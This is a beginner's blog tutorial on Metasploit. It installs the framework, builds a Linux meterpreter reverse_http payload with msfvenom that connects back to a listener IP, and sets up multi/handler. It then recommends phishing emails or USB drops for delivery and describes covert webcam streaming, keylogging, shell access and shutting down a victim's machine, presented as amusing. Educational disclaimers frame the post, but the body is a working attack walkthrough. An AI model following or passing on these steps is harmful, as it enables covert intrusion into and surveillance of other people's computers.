Before we start: (Disclaimer)
The contents of this writing is only for educational and fun puposes. I strongly suggest against, and I am not in any way responsible for, any misuse of the information given. This writing and tutorial has been made using my own hardware. No illegal activity is done or encouraged.
Before i dive in to the actuall tutorial. I would like to cover few basic pieces of information that we will need to understand, including keywords.
What is Metasploit?
It is a very powerful tool used by many cyber criminals and ethical hackers to probe vulnerabilities of networks, servers and personal computers as well. This is completely an open-source framework, this can be customized and can be used with many operating systems.
The latest version of this power-house is 6.0.24, released on December 31,2020.
This version currently has 2128 exploits and is being updated on a daily basis.
What is a Payload?
A Payload can be called as shell code that runs after an exploit successfully compromises a system. It enables you to define how you want to connect to the target shell and what you want to do with the target system after you take control over it.
Installation:
There are quite a lot of ways of installing metasploit. I assume that you are using linux and have curl installed already. If you are a kali-linux user you are lucky enough, you already have metasploit installed.
If you are using any debian based linux distros you can follow this installation steps:
Interesting Fact: Metasploit is first written in Perl. It is completely re-written in ruby by 2007.
Installing dependencies:
Metasploit-framework uses lots of dependencies including postgresql..etc.
sudo apt-get install -y curl gpgv2 autoconf bison build-essential
git-corelibapr1 postgresql libaprutil1 libcurl4openssl-dev libgmp3-dev libpcap-dev openssl libpq-dev libreadline6-dev libsqlite3-dev libssl-dev locate libsvn1 libtool libxml2 libxml2-dev libxslt-dev wget libyaml-dev ncurses-dev postgresql-contrib xsel zlib1g zlib1g-devInstalling metasploit:
The reason behind choosing ‘curl’ for the installation is it supports a lot of protocols. curl usually is used to transfer files from remote computers.
curl https://raw.githubusercontent.com/rapid7/metasploit
omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \changing the permissions of the executable
chmod 755 msfinstallwondered why i used ‘755’ instead of ‘+x ‘ as ‘chmod’ option ? you can check the difference between them here.
Running the executable:
./msfinstallKewl, you are done installing the Metasploit-framework. Sit back, relax and watch as the installation progresses.
Now that you have Metasploit-framework it’s time to play with it. Quickly start the postgresql service and fire up metasploit by executing the commands shown
service postgresql startsudo msfconsole
This command asks you for the password, when you are done giving in the password, you’re done.
The First Attack:
Now that we are ready with metasploit we can perform as many attacks as we wish but for this tutorial I’ve choosen a linux machine as a Target.
Almost every event in existence requires a proper plan and should follow a proper sequence. Here is one same case. so before anything we’ll plan the attack.
Plan of Attack:
In this blog, As I mentioned above i will be using Linux machines as target. To do this i will be using Metasploit’s reverse_http meterpreter payload.
- setting up Metasploit
- Generating the payload
- Delivering the payload
- Opening the Meterpreter session
- Meterpreter commands
setting up metasploit:
It is a good practice to update the metasploit time you fire it up. You can update Metasploit by executing the following command.
msfupdatechecking the database status:
db_statusThis command checks if the database is connected.
you should see something similar to this. probably won’t look exactly the same but just make sure you can see somewhere it is ‘connected’.
We can now move on to our next step.
Generating payloads:
Each attack requires a different payload. To choose the right payload we can search through all the 2128 exploits and 596 payloads that Metasploit currently has using the ‘search’ command.
search works with various arguments
- type
- platform
- payload-port
search
Here is how we pass in arguments to this search command to find the right payload.
search type:payload platform:linux meterpreter
We might get a large list of payloads. so when we are choosing a payload just take your time to search for some good working payload. Here is the payload that i’m going to use in this blog.
- linux/x64/meterpreter_reverse_http
Feel free to use other payloads and explore, This is a very exciting thing to do. personally i feel like spending hours in it. once you get stated, you can never stop exploring.
Creating a payload using MsfVenom:
Once you have found your desired payload, we must turn it into an executable file which the victim can run on the target machine to start the meterpreter session. To do so we must use ‘msfvenom’ which is Metasploit’s command for generating executable payloads.
Here we can see all of the different options you can use when using msfvenom. The parameters we are going to use are:
- Payload (name of chosen payload).
- Format (format of the output file, e.g. .exe or .pdf).
- Arch (architecture of target, e.g x32, x64 or x86).
- Other custom parameters like LHOST and LPORT.
Before creating a payload we need to know the host Ip and port. if your target is on the same network then we can find your local ipv4 address just by giving in
ifconfigIn my case the target machine is in the same network. Worried?
Yeah, that is quite understandable…xD. what if the target is in a different network? we will need to do something called as port forwarding which will not be covered in this blog. ( I’ll try coming up with a different blog on it soon).
But now, For the port you simply need to choose a port for the meterpreter to bind to. Today I am using port 4444.
So, now we are ready with the parameters we are going to choose we can generate the a payload. command i used to generate my payload is as follows:
msfvenom -p linux/x64/meterpreter_reverse_http lhost=192.168.58.164 -f elf -o linuxMeterpreter.elfIf this command is successfully executed then the output file will be created in the current directory.
Delivering the payload:
This is the most crucial part of the attack. This is the part where real-world hackers win. They always choose smart ways to deliver the payload and make the user execute it very easily so they can get their work done soon. Mode of delivery of the payload is such a huge topic to discuss in this blog. However, you can try some basic methods
- Via email → A phishing attack asking the user to download a file is a very successful and common example of getting a payload onto a victim’s machine.
- Physical access → You could simply just plug a USB with the payload into the victim’s machine and execute the file. The only problem is you need physical access.
Opening a Meterpreter session:
So if you have successfully gotten your payload onto your targets machine you might probably be wondering on what is to be done next. so the answer to this is we must first configure the metasploit to listen for the meterpreter sessions.
so first fire up metasploit again using
msfconsoleonce it is fired up , we simply tell it to use the ‘ multi/handler ‘ module.
use multi/handler
Once we loaded the ‘multi/handler’ module, we now have to tell the Metasploit what payload we used for the malicious file we generated.
set payload linux/x64/meterpreter_reverse_httpNow we have to set the LHOST and LPORT for the metasploit to listen on.
set LHOST 192.168.58.164show options
For this step make sure that you use the same ip as when we created the executable using msfvenom. I didn’t set the LPORT because my target was on the same network and it doesn’t matter when the target is in the same network.
‘ show options ’ command on the msfconsole shows the currently set options in the exploit.
Now is the time you are waiting for, we’ve configured metasploit, delivered the payload to the target and you have to tell metasploit to listen for the payload to open a session. we do that using
exploit
This means Metasploit is listening for the meterpreter session to start. once the victim executes the delivered payload then the meterpreter session starts.
Meterpreter session commands on linux reverse_http handler:
The above screenshot is how it looks when youe target executes the payload you’ve delivered.
helpwe can use ‘help’ command to tell us what can be done post exploitation.
Ever imagined how dangerous this can turn out to be. once the session is created we can get access to the targets webcam, microphone.
we can record the targets key strokes and visualize it to get some useful data. And also play audio in targets machine. Imagine how crazy it would be to play an audio on someone’s machine with the victim having almost no clue on what’s happening…xD.
we can stream the webcam by the command:
webcam_stream
your targets webcam stream is readily available at the highlighted address in the screenshot. (it might be a different address to you.)
you can get access to the targets shell by executing the ‘shell’ command in the meterpreter session.
shell
you can even shutdown the target’s machine without him having a clue about what’s happening on his own computer. ..xD
closing statement:
The target is successfully hacked.
Disclosure:
If you didn’t read this at the beginning read it now, this blog is for educational and fun purposes only. All the hardware involved in this hacks is my own and no illegal activity is involved or encouraged.
Final words:
This is my first ever blog. I hope this gives you some interest in metasploit and cyber security as a whole. I thoroughly enjoyed writing this blog. feel free to reach out to me with comments through mail.
My mail: kv.sridharsai@gmail.com
Thank you for reading this blog :) . I hope you’ve learnt something new. Hope to see you in the next blog.
